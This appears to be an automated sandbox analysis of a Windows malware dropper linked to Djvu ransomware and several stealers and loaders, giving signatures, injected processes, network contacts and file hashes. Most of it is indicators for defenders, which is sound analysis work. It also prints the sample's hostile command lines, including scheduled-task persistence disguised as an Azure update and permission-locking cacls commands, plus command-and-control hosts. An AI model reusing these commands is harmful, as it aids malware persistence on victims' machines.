Malware Analysis Report

2025-01-18 06:22

Sample ID 231018-wqdhjahd6z
Target NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe
SHA256 779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64
Tags
amadey djvu redline smokeloader vidar logsdiller cloud (tg: @logsdillabot) summ backdoor collection discovery evasion infostealer persistence ransomware stealer themida trojan glupteba pub1 dropper loader spyware upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64

Threat Level: Known bad

The file NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe was found to be: Known bad.

Malicious Activity Summary


RedLine

Glupteba payload

Glupteba

Detected Djvu ransomware

Djvu Ransomware

Amadey

Vidar

SmokeLoader

RedLine payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Modifies Windows Firewall

Stops running service(s)

UPX packed file

Executes dropped EXE

Checks computer location settings

Modifies file permissions

Deletes itself

Checks BIOS information in registry

Loads dropped DLL

Themida packer

Accesses Microsoft Outlook profiles

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Checks whether UAC is enabled

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Enumerates physical storage devices

Program crash

Unsigned PE

Creates scheduled task(s)

outlook_win_path

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious behavior: GetForegroundWindowSpam

Modifies data under HKEY_USERS

Checks SCSI registry key(s)

outlook_office_path

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of UnmapMainImage

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-18 18:07

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-18 18:07

Reported

2023-10-18 18:13

Platform

win7-20230831-en

Max time kernel

151s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe"

Signatures

Amadey

trojan amadey

Detected Djvu ransomware

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Djvu Ransomware

ransomware djvu

RedLine

infostealer redline

RedLine payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\8B02.exe | N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\8B02.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\8B02.exe | N/A

Deletes itself

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Modifies file permissions

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A

Themida packer

themida
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\explorer.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\explorer.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\explorer.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\2259af8a-cce1-4d72-80ee-fa37b1e9acb5\\8363.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\8363.exe | N/A

Checks whether UAC is enabled

evasion trojan
Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\8B02.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | api.2ip.ua | N/A | N/A
N/A | api.2ip.ua | N/A | N/A
N/A | api.2ip.ua | N/A | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8B02.exe | N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\BD89.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe | N/A
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe | N/A
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\BD89.exe | N/A
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\BD89.exe | N/A

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BD89.exe | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1248 wrote to memory of 2976 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 1248 wrote to memory of 2976 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 1248 wrote to memory of 2976 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 1248 wrote to memory of 2976 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 | N/A | C:\Users\Admin\AppData\Local\Temp\8363.exe | C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 | N/A | C:\Users\Admin\AppData\Local\Temp\8363.exe | C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 | N/A | C:\Users\Admin\AppData\Local\Temp\8363.exe | C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 | N/A | C:\Users\Admin\AppData\Local\Temp\8363.exe | C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 | N/A | C:\Users\Admin\AppData\Local\Temp\8363.exe | C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 | N/A | C:\Users\Admin\AppData\Local\Temp\8363.exe | C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 | N/A | C:\Users\Admin\AppData\Local\Temp\8363.exe | C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 | N/A | C:\Users\Admin\AppData\Local\Temp\8363.exe | C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 | N/A | C:\Users\Admin\AppData\Local\Temp\8363.exe | C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 | N/A | C:\Users\Admin\AppData\Local\Temp\8363.exe | C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 | N/A | C:\Users\Admin\AppData\Local\Temp\8363.exe | C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 1248 wrote to memory of 2628 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8B02.exe
PID 1248 wrote to memory of 2628 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8B02.exe
PID 1248 wrote to memory of 2628 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8B02.exe
PID 1248 wrote to memory of 2628 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8B02.exe
PID 1248 wrote to memory of 2512 | N/A | N/A | C:\Windows\system32\regsvr32.exe
PID 1248 wrote to memory of 2512 | N/A | N/A | C:\Windows\system32\regsvr32.exe
PID 1248 wrote to memory of 2512 | N/A | N/A | C:\Windows\system32\regsvr32.exe
PID 1248 wrote to memory of 2512 | N/A | N/A | C:\Windows\system32\regsvr32.exe
PID 1248 wrote to memory of 2512 | N/A | N/A | C:\Windows\system32\regsvr32.exe
PID 2512 wrote to memory of 3056 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe
PID 2512 wrote to memory of 3056 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe
PID 2512 wrote to memory of 3056 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe
PID 2512 wrote to memory of 3056 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe
PID 2512 wrote to memory of 3056 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe
PID 2512 wrote to memory of 3056 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe
PID 2512 wrote to memory of 3056 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe
PID 1248 wrote to memory of 1988 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B510.exe
PID 1248 wrote to memory of 1988 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B510.exe
PID 1248 wrote to memory of 1988 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B510.exe
PID 1248 wrote to memory of 1988 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B510.exe
PID 1248 wrote to memory of 1972 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BD89.exe
PID 1248 wrote to memory of 1972 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BD89.exe
PID 1248 wrote to memory of 1972 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BD89.exe
PID 1248 wrote to memory of 1972 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BD89.exe
PID 1248 wrote to memory of 1476 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\D06E.exe
PID 1248 wrote to memory of 1476 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\D06E.exe
PID 1248 wrote to memory of 1476 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\D06E.exe
PID 1248 wrote to memory of 1476 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\D06E.exe
PID 1988 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\B510.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\B510.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\B510.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\B510.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\B510.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\B510.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\B510.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\B510.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\B510.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\B510.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\B510.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 | N/A | C:\Users\Admin\AppData\Local\Temp\B510.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2680 wrote to memory of 2216 | N/A | C:\Users\Admin\AppData\Local\Temp\8363.exe | C:\Windows\SysWOW64\icacls.exe
PID 2680 wrote to memory of 2216 | N/A | C:\Users\Admin\AppData\Local\Temp\8363.exe | C:\Windows\SysWOW64\icacls.exe
PID 2680 wrote to memory of 2216 | N/A | C:\Users\Admin\AppData\Local\Temp\8363.exe | C:\Windows\SysWOW64\icacls.exe
PID 2680 wrote to memory of 2216 | N/A | C:\Users\Admin\AppData\Local\Temp\8363.exe | C:\Windows\SysWOW64\icacls.exe
PID 1248 wrote to memory of 1440 | N/A | N/A | C:\Windows\SysWOW64\explorer.exe
PID 1248 wrote to memory of 1440 | N/A | N/A | C:\Windows\SysWOW64\explorer.exe
PID 1248 wrote to memory of 1440 | N/A | N/A | C:\Windows\SysWOW64\explorer.exe
PID 1248 wrote to memory of 1440 | N/A | N/A | C:\Windows\SysWOW64\explorer.exe
PID 1248 wrote to memory of 1440 | N/A | N/A | C:\Windows\SysWOW64\explorer.exe

outlook_office_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\explorer.exe | N/A

outlook_win_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\explorer.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe

"C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe"

C:\Users\Admin\AppData\Local\Temp\8363.exe

C:\Users\Admin\AppData\Local\Temp\8363.exe

C:\Users\Admin\AppData\Local\Temp\8363.exe

C:\Users\Admin\AppData\Local\Temp\8363.exe

C:\Users\Admin\AppData\Local\Temp\8B02.exe

C:\Users\Admin\AppData\Local\Temp\8B02.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\A6AD.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\A6AD.dll

C:\Users\Admin\AppData\Local\Temp\B510.exe

C:\Users\Admin\AppData\Local\Temp\B510.exe

C:\Users\Admin\AppData\Local\Temp\BD89.exe

C:\Users\Admin\AppData\Local\Temp\BD89.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\D06E.exe

C:\Users\Admin\AppData\Local\Temp\D06E.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\2259af8a-cce1-4d72-80ee-fa37b1e9acb5" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

"C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\8363.exe

"C:\Users\Admin\AppData\Local\Temp\8363.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\8363.exe

"C:\Users\Admin\AppData\Local\Temp\8363.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build2.exe

"C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build2.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build2.exe

"C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build2.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build3.exe

"C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build3.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build3.exe

"C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | onualituyrs.org | udp
US | 8.8.8.8:53 | sumagulituyo.org | udp
US | 34.94.245.237:80 | sumagulituyo.org | tcp
US | 8.8.8.8:53 | snukerukeutit.org | udp
US | 104.198.2.251:80 | snukerukeutit.org | tcp
US | 8.8.8.8:53 | lightseinsteniki.org | udp
SG | 34.143.166.163:80 | lightseinsteniki.org | tcp
US | 8.8.8.8:53 | liuliuoumumy.org | udp
SG | 34.143.166.163:80 | liuliuoumumy.org | tcp
US | 8.8.8.8:53 | stualialuyastrelia.net | udp
RU | 91.215.85.17:80 | stualialuyastrelia.net | tcp
US | 8.8.8.8:53 | api.2ip.ua | udp
US | 188.114.96.0:443 | api.2ip.ua | tcp
RU | 79.137.192.18:80 | 79.137.192.18 | tcp
US | 8.8.8.8:53 | alayyadcare.com | udp
PS | 213.6.54.58:443 | alayyadcare.com | tcp
PS | 213.6.54.58:443 | alayyadcare.com | tcp
US | 8.8.8.8:53 | montereyclub.org | udp
US | 172.67.196.133:443 | montereyclub.org | tcp
US | 8.8.8.8:53 | loveperry.org | udp
US | 8.8.8.8:53 | stalagmijesarl.com | udp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
RU | 79.137.192.18:80 | 79.137.192.18 | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
US | 188.114.96.0:443 | api.2ip.ua | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
US | 8.8.8.8:53 | transfer.sh | udp
US | 8.8.8.8:53 | colisumy.com | udp
DE | 144.76.136.153:443 | transfer.sh | tcp
US | 8.8.8.8:53 | zexeq.com | udp
US | 8.8.8.8:53 | apps.identrust.com | udp
NL | 23.72.252.139:80 | apps.identrust.com | tcp
KR | 175.120.254.9:80 | zexeq.com | tcp
MX | 189.169.91.61:80 | colisumy.com | tcp
BG | 171.22.28.236:38306 | | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
KR | 175.120.254.9:80 | zexeq.com | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp
US | 95.214.26.31:80 | stalagmijesarl.com | tcp

Files

memory/2016-1-0x0000000000290000-0x0000000000390000-memory.dmp

memory/2016-2-0x0000000000400000-0x00000000007CD000-memory.dmp

memory/2016-3-0x00000000001B0000-0x00000000001BB000-memory.dmp

memory/1248-4-0x0000000002AA0000-0x0000000002AB6000-memory.dmp

memory/2016-5-0x0000000000400000-0x00000000007CD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8363.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

C:\Users\Admin\AppData\Local\Temp\8363.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
